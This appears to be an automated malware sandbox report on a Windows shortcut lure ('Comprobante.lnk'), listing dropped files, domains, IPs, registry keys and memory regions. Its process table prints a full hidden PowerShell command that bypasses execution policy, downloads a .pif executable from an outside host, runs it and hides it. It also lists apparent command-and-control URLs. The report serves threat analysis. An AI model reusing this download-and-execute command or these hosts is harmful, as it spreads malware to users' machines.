Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Comprobante.lnk.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\Desktop\screens.pif
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\screens.pif.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eyh3bmu.mud.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqa30ycs.ic0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmzi4otn.c2j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtumicvz.4td.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\188E93\31437F.lck
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\bb7e5d0cf2dfb2b59be71d56e848e059_9e146be9-c76a-4720-bcdb-53011b87bd06
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GI5H1UFK6LW59IUH41EH.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a5cebb9ded06a97e.customDestinations-ms (copy)
|
data
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object
System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item
'screens.pif').Attributes += 'Hidden';
|
|
|
|
C:\Users\user\Desktop\screens.pif
|
"C:\Users\user\Desktop\screens.pif"
|
|
|
|
C:\Users\user\Desktop\screens.pif
|
C:\Users\user\Desktop\screens.pif
|
|
|
|
C:\Users\user\Desktop\screens.pif
|
C:\Users\user\Desktop\screens.pif
|
|
|
|
C:\Users\user\Desktop\screens.pif
|
C:\Users\user\Desktop\screens.pif
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
|
||
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
|
45.149.241.169
|
|
|
|
http://kbfvzoboss.bid/alien/fre.php
|
|
||
|
http://alphastand.top/alien/fre.php
|
|
||
|
http://alphastand.win/alien/fre.php
|
|
||
|
http://alphastand.trade/alien/fre.php
|
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif
|
188.114.97.3
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.ibsensoftware.com/
|
unknown
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com/N
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com/ow
|
unknown
|
||
|
http://www.microsoft.co7
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
freighteighttwocam.ddns.net
|
45.149.241.169
|
|
|
|
www.sodiumlaurethsulfatedesyroyer.com
|
188.114.97.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
www.sodiumlaurethsulfatedesyroyer.com
|
European Union
|
|
|
|
45.149.241.169
|
freighteighttwocam.ddns.net
|
Germany
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\PoWeRShElL_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2F17000
|
trusted library allocation
|
page read and write
|
|
|
|
13D8000
|
heap
|
page read and write
|
|
|
|
2EFA000
|
trusted library allocation
|
page read and write
|
|
|
|
2F32000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
4988000
|
trusted library allocation
|
page read and write
|
|
|
|
7FF7C0474000
|
trusted library allocation
|
page read and write
|
||
|
27825FE8000
|
trusted library allocation
|
page read and write
|
||
|
278229E0000
|
heap
|
page read and write
|
||
|
2783CFD4000
|
heap
|
page read and write
|
||
|
27822BF0000
|
heap
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
E120000
|
trusted library allocation
|
page read and write
|
||
|
27824B10000
|
heap
|
page read and write
|
||
|
7FF7C0530000
|
trusted library allocation
|
page read and write
|
||
|
1464000
|
heap
|
page read and write
|
||
|
D6BE97B000
|
stack
|
page read and write
|
||
|
278255FD000
|
trusted library allocation
|
page read and write
|
||
|
2783CFDD000
|
heap
|
page read and write
|
||
|
27834FCD000
|
trusted library allocation
|
page read and write
|
||
|
2783CF72000
|
heap
|
page read and write
|
||
|
D6BEDFE000
|
stack
|
page read and write
|
||
|
E0CB000
|
trusted library section
|
page read and write
|
||
|
7FF7C0520000
|
trusted library allocation
|
page read and write
|
||
|
1260000
|
trusted library allocation
|
page read and write
|
||
|
278255C5000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
2783CD60000
|
trusted library allocation
|
page read and write
|
||
|
D6BE51E000
|
stack
|
page read and write
|
||
|
27822A72000
|
heap
|
page read and write
|
||
|
1280000
|
heap
|
page read and write
|
||
|
73D000
|
stack
|
page read and write
|
||
|
7FF7C0570000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0124000
|
trusted library allocation
|
page read and write
|
||
|
27825F0F000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0479000
|
trusted library allocation
|
page read and write
|
||
|
1230000
|
trusted library allocation
|
page read and write
|
||
|
2783CFED000
|
heap
|
page read and write
|
||
|
E0F0000
|
trusted library allocation
|
page read and write
|
||
|
2783CE8C000
|
heap
|
page read and write
|
||
|
F9C000
|
stack
|
page read and write
|
||
|
1243000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C017C000
|
trusted library allocation
|
page execute and read and write
|
||
|
D6BF9CE000
|
stack
|
page read and write
|
||
|
7FF7C013B000
|
trusted library allocation
|
page read and write
|
||
|
E129000
|
trusted library allocation
|
page read and write
|
||
|
E0EB000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0206000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C02F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
124E000
|
stack
|
page read and write
|
||
|
27822CB5000
|
heap
|
page read and write
|
||
|
E44E000
|
stack
|
page read and write
|
||
|
27824B9E000
|
heap
|
page read and write
|
||
|
1250000
|
trusted library allocation
|
page read and write
|
||
|
1244000
|
trusted library allocation
|
page read and write
|
||
|
27825EAB000
|
trusted library allocation
|
page read and write
|
||
|
2E71000
|
trusted library allocation
|
page read and write
|
||
|
E0D0000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
heap
|
page read and write
|
||
|
7FF7C0590000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0560000
|
trusted library allocation
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
BFB000
|
stack
|
page read and write
|
||
|
7FF7C0390000
|
trusted library allocation
|
page read and write
|
||
|
27834CD1000
|
trusted library allocation
|
page read and write
|
||
|
27822ABC000
|
heap
|
page read and write
|
||
|
7FF7C03D0000
|
trusted library allocation
|
page read and write
|
||
|
2783CD70000
|
heap
|
page read and write
|
||
|
2783CFB7000
|
heap
|
page read and write
|
||
|
7FF7C0580000
|
trusted library allocation
|
page read and write
|
||
|
27824C97000
|
heap
|
page execute and read and write
|
||
|
7FF7C03C0000
|
trusted library allocation
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
27824B4F000
|
heap
|
page read and write
|
||
|
7FF7C0450000
|
trusted library allocation
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
D6BFA4F000
|
stack
|
page read and write
|
||
|
27825E3F000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0488000
|
trusted library allocation
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
27824BDF000
|
heap
|
page read and write
|
||
|
D6BE5DE000
|
stack
|
page read and write
|
||
|
27824BE9000
|
heap
|
page read and write
|
||
|
E101000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0340000
|
trusted library allocation
|
page read and write
|
||
|
138E000
|
stack
|
page read and write
|
||
|
2EAE000
|
stack
|
page read and write
|
||
|
63C000
|
stack
|
page read and write
|
||
|
7FF7C04B0000
|
trusted library allocation
|
page read and write
|
||
|
27834D01000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0302000
|
trusted library allocation
|
page read and write
|
||
|
27824B20000
|
heap
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
2CAE000
|
stack
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
7FF7C0123000
|
trusted library allocation
|
page execute and read and write
|
||
|
1011000
|
heap
|
page read and write
|
||
|
7DF40F700000
|
trusted library allocation
|
page execute and read and write
|
||
|
1240000
|
trusted library allocation
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
7FF7C0130000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C01D0000
|
trusted library allocation
|
page read and write
|
||
|
1266000
|
trusted library allocation
|
page execute and read and write
|
||
|
B00000
|
unkown
|
page readonly
|
||
|
278255D7000
|
trusted library allocation
|
page read and write
|
||
|
D6BEAFA000
|
stack
|
page read and write
|
||
|
7FF7C0370000
|
trusted library allocation
|
page read and write
|
||
|
FD6000
|
heap
|
page read and write
|
||
|
7FF7C0320000
|
trusted library allocation
|
page read and write
|
||
|
27822CB0000
|
heap
|
page read and write
|
||
|
4920000
|
trusted library allocation
|
page read and write
|
||
|
27824BEB000
|
heap
|
page read and write
|
||
|
E070000
|
trusted library section
|
page read and write
|
||
|
52F0000
|
trusted library allocation
|
page read and write
|
||
|
278255BE000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0140000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0440000
|
trusted library allocation
|
page read and write
|
||
|
D6BFACD000
|
stack
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
7FF7C0550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0510000
|
trusted library allocation
|
page read and write
|
||
|
ABCD000
|
stack
|
page read and write
|
||
|
278249A0000
|
trusted library allocation
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
12A0000
|
heap
|
page read and write
|
||
|
7FF7C03E0000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
27824B60000
|
heap
|
page read and write
|
||
|
10A0000
|
heap
|
page read and write
|
||
|
11FE000
|
stack
|
page read and write
|
||
|
1446000
|
heap
|
page read and write
|
||
|
2783CFC1000
|
heap
|
page read and write
|
||
|
27824560000
|
trusted library allocation
|
page read and write
|
||
|
27822AC7000
|
heap
|
page read and write
|
||
|
D6BEC7C000
|
stack
|
page read and write
|
||
|
E130000
|
trusted library allocation
|
page read and write
|
||
|
FB8000
|
heap
|
page read and write
|
||
|
7FF7C01D6000
|
trusted library allocation
|
page read and write
|
||
|
E54E000
|
stack
|
page read and write
|
||
|
481C000
|
trusted library allocation
|
page read and write
|
||
|
2CB0000
|
trusted library allocation
|
page read and write
|
||
|
27824970000
|
trusted library allocation
|
page read and write
|
||
|
27825380000
|
trusted library allocation
|
page read and write
|
||
|
127B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C012D000
|
trusted library allocation
|
page execute and read and write
|
||
|
ABE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
D6BECF7000
|
stack
|
page read and write
|
||
|
27826ADE000
|
trusted library allocation
|
page read and write
|
||
|
15CF000
|
stack
|
page read and write
|
||
|
FFE000
|
heap
|
page read and write
|
||
|
27822C30000
|
heap
|
page read and write
|
||
|
E24E000
|
stack
|
page read and write
|
||
|
7FF7C05B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C048C000
|
trusted library allocation
|
page read and write
|
||
|
278255D9000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C02D1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C03B0000
|
trusted library allocation
|
page read and write
|
||
|
11BE000
|
stack
|
page read and write
|
||
|
7FF7C05D2000
|
trusted library allocation
|
page read and write
|
||
|
1277000
|
trusted library allocation
|
page execute and read and write
|
||
|
1270000
|
trusted library allocation
|
page read and write
|
||
|
47E8000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C02E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2783CED6000
|
heap
|
page read and write
|
||
|
124D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27825314000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0480000
|
trusted library allocation
|
page read and write
|
||
|
475D000
|
trusted library allocation
|
page read and write
|
||
|
278265D1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0400000
|
trusted library allocation
|
page read and write
|
||
|
7DF40F720000
|
trusted library allocation
|
page execute and read and write
|
||
|
27834D45000
|
trusted library allocation
|
page read and write
|
||
|
27825376000
|
trusted library allocation
|
page read and write
|
||
|
E12C000
|
trusted library allocation
|
page read and write
|
||
|
1254000
|
trusted library allocation
|
page read and write
|
||
|
6FD000
|
stack
|
page read and write
|
||
|
27825E7C000
|
trusted library allocation
|
page read and write
|
||
|
3E75000
|
trusted library allocation
|
page read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
27822A93000
|
heap
|
page read and write
|
||
|
2783CD90000
|
heap
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
F98000
|
heap
|
page read and write
|
||
|
B52000
|
unkown
|
page readonly
|
||
|
278249EF000
|
heap
|
page read and write
|
||
|
B02000
|
unkown
|
page readonly
|
||
|
27824BD1000
|
heap
|
page read and write
|
||
|
D6BE495000
|
stack
|
page read and write
|
||
|
10A5000
|
heap
|
page read and write
|
||
|
7FF7C02DA000
|
trusted library allocation
|
page read and write
|
||
|
D6BEBF7000
|
stack
|
page read and write
|
||
|
2783D02F000
|
heap
|
page read and write
|
||
|
27824D58000
|
trusted library allocation
|
page read and write
|
||
|
2783CF8F000
|
heap
|
page read and write
|
||
|
BC10000
|
trusted library allocation
|
page read and write
|
||
|
27824C90000
|
heap
|
page execute and read and write
|
||
|
5470000
|
trusted library section
|
page read and write
|
||
|
5480000
|
heap
|
page read and write
|
||
|
AEA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0240000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0380000
|
trusted library allocation
|
page read and write
|
||
|
27826751000
|
trusted library allocation
|
page read and write
|
||
|
27826A2A000
|
trusted library allocation
|
page read and write
|
||
|
1079000
|
heap
|
page read and write
|
||
|
7DF40F710000
|
trusted library allocation
|
page execute and read and write
|
||
|
27824B5B000
|
heap
|
page read and write
|
||
|
27826B67000
|
trusted library allocation
|
page read and write
|
||
|
46BE000
|
trusted library allocation
|
page read and write
|
||
|
2D40000
|
trusted library section
|
page read and write
|
||
|
E0FE000
|
trusted library allocation
|
page read and write
|
||
|
2F15000
|
trusted library allocation
|
page read and write
|
||
|
27822BD0000
|
heap
|
page read and write
|
||
|
278268D0000
|
trusted library allocation
|
page read and write
|
||
|
144D000
|
heap
|
page read and write
|
||
|
3E71000
|
trusted library allocation
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
27824EFA000
|
trusted library allocation
|
page read and write
|
||
|
278262FE000
|
trusted library allocation
|
page read and write
|
||
|
27824C1D000
|
heap
|
page read and write
|
||
|
D6BE8FE000
|
stack
|
page read and write
|
||
|
4EAC000
|
stack
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
7FF7C01E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5310000
|
heap
|
page execute and read and write
|
||
|
D6BEB79000
|
stack
|
page read and write
|
||
|
2783D058000
|
heap
|
page read and write
|
||
|
27834CF1000
|
trusted library allocation
|
page read and write
|
||
|
D6BEA7F000
|
stack
|
page read and write
|
||
|
2783D056000
|
heap
|
page read and write
|
||
|
3460000
|
heap
|
page read and write
|
||
|
D6BE87D000
|
stack
|
page read and write
|
||
|
2783CE70000
|
heap
|
page read and write
|
||
|
27824B4A000
|
heap
|
page read and write
|
||
|
B00000
|
unkown
|
page execute and read and write
|
||
|
D6BF94F000
|
stack
|
page read and write
|
||
|
F9E000
|
heap
|
page read and write
|
||
|
7FF7C0350000
|
trusted library allocation
|
page read and write
|
||
|
AE6D000
|
stack
|
page read and write
|
||
|
EF8000
|
stack
|
page read and write
|
||
|
E68F000
|
stack
|
page read and write
|
||
|
B5E000
|
unkown
|
page readonly
|
||
|
27824585000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
27826A49000
|
trusted library allocation
|
page read and write
|
||
|
278255E5000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0122000
|
trusted library allocation
|
page read and write
|
||
|
D6BE9FE000
|
stack
|
page read and write
|
||
|
2E6E000
|
stack
|
page read and write
|
||
|
14A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0513000
|
trusted library allocation
|
page read and write
|
||
|
27825C2D000
|
trusted library allocation
|
page read and write
|
||
|
126A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0490000
|
trusted library allocation
|
page read and write
|
||
|
100C000
|
heap
|
page read and write
|
||
|
AEEE000
|
stack
|
page read and write
|
||
|
27824B68000
|
heap
|
page read and write
|
||
|
D6BE59E000
|
stack
|
page read and write
|
||
|
7FF7C0430000
|
trusted library allocation
|
page read and write
|
||
|
AFEF000
|
stack
|
page read and write
|
||
|
7FF7C03F0000
|
trusted library allocation
|
page read and write
|
||
|
2783CEC0000
|
heap
|
page read and write
|
||
|
7FF7C04A0000
|
trusted library allocation
|
page read and write
|
||
|
2783CF9D000
|
heap
|
page read and write
|
||
|
27834FC3000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C05D4000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
7FF7C05E0000
|
trusted library allocation
|
page read and write
|
||
|
AD2D000
|
stack
|
page read and write
|
||
|
7FF7C0588000
|
trusted library allocation
|
page read and write
|
||
|
12A5000
|
heap
|
page read and write
|
||
|
AACE000
|
stack
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
2783CF77000
|
heap
|
page read and write
|
||
|
46F2000
|
trusted library allocation
|
page read and write
|
||
|
27824CD1000
|
trusted library allocation
|
page read and write
|
||
|
1001000
|
heap
|
page read and write
|
||
|
2783D390000
|
heap
|
page read and write
|
||
|
2783CF89000
|
heap
|
page read and write
|
||
|
7FF7C01DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C03A0000
|
trusted library allocation
|
page read and write
|
||
|
ABD0000
|
trusted library allocation
|
page read and write
|
||
|
AD6E000
|
stack
|
page read and write
|
||
|
27822AF0000
|
heap
|
page read and write
|
||
|
27825983000
|
trusted library allocation
|
page read and write
|
||
|
27824540000
|
heap
|
page read and write
|
||
|
E115000
|
trusted library allocation
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
49F000
|
remote allocation
|
page execute and read and write
|
||
|
35D000
|
stack
|
page read and write
|
||
|
27824530000
|
trusted library allocation
|
page read and write
|
||
|
E58E000
|
stack
|
page read and write
|
||
|
278229F2000
|
heap
|
page read and write
|
||
|
2D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
27824500000
|
trusted library allocation
|
page read and write
|
||
|
27824550000
|
heap
|
page readonly
|
||
|
7FF7C0360000
|
trusted library allocation
|
page read and write
|
||
|
2783CF06000
|
heap
|
page read and write
|
||
|
E9C000
|
stack
|
page read and write
|
||
|
2783D03F000
|
heap
|
page read and write
|
||
|
A98E000
|
stack
|
page read and write
|
||
|
27834FBE000
|
trusted library allocation
|
page read and write
|
||
|
E0E6000
|
trusted library allocation
|
page read and write
|
||
|
27822A7B000
|
heap
|
page read and write
|
||
|
D6BED7E000
|
stack
|
page read and write
|
||
|
AC2E000
|
stack
|
page read and write
|
||
|
7FF7C02C0000
|
trusted library allocation
|
page read and write
|
||
|
48B8000
|
trusted library allocation
|
page read and write
|
||
|
2D60000
|
heap
|
page execute and read and write
|
||
|
B52000
|
unkown
|
page execute and read and write
|
||
|
2F50000
|
trusted library allocation
|
page read and write
|
||
|
27824CC0000
|
heap
|
page execute and read and write
|
||
|
D060000
|
trusted library allocation
|
page execute and read and write
|
||
|
2783D009000
|
heap
|
page read and write
|
||
|
143D000
|
heap
|
page read and write
|
||
|
D6BEF7C000
|
stack
|
page read and write
|
||
|
14B0000
|
heap
|
page read and write
|
||
|
27824580000
|
heap
|
page read and write
|
||
|
AA8D000
|
stack
|
page read and write
|
||
|
7FF7C0410000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0420000
|
trusted library allocation
|
page read and write
|
||
|
27826C78000
|
trusted library allocation
|
page read and write
|
||
|
2783CFAB000
|
heap
|
page read and write
|
||
|
E139000
|
trusted library allocation
|
page read and write
|
||
|
2783D05E000
|
heap
|
page read and write
|
||
|
106C000
|
heap
|
page read and write
|
||
|
7FF7C0330000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0540000
|
trusted library allocation
|
page read and write
|
||
|
B02000
|
unkown
|
page execute and read and write
|
||
|
D6BEE7D000
|
stack
|
page read and write
|
||
|
D6BEEFE000
|
stack
|
page read and write
|
||
|
545E000
|
stack
|
page read and write
|
||
|
7FF7C0470000
|
trusted library allocation
|
page read and write
|
||
|
148E000
|
stack
|
page read and write
|
||
|
7FF7C0310000
|
trusted library allocation
|
page execute and read and write
|
||
|
2783CD40000
|
heap
|
page execute and read and write
|
||
|
278255E9000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0453000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
E28E000
|
stack
|
page read and write
|
||
|
27822A18000
|
heap
|
page read and write
|
There are 332 hidden memdumps, click here to show them.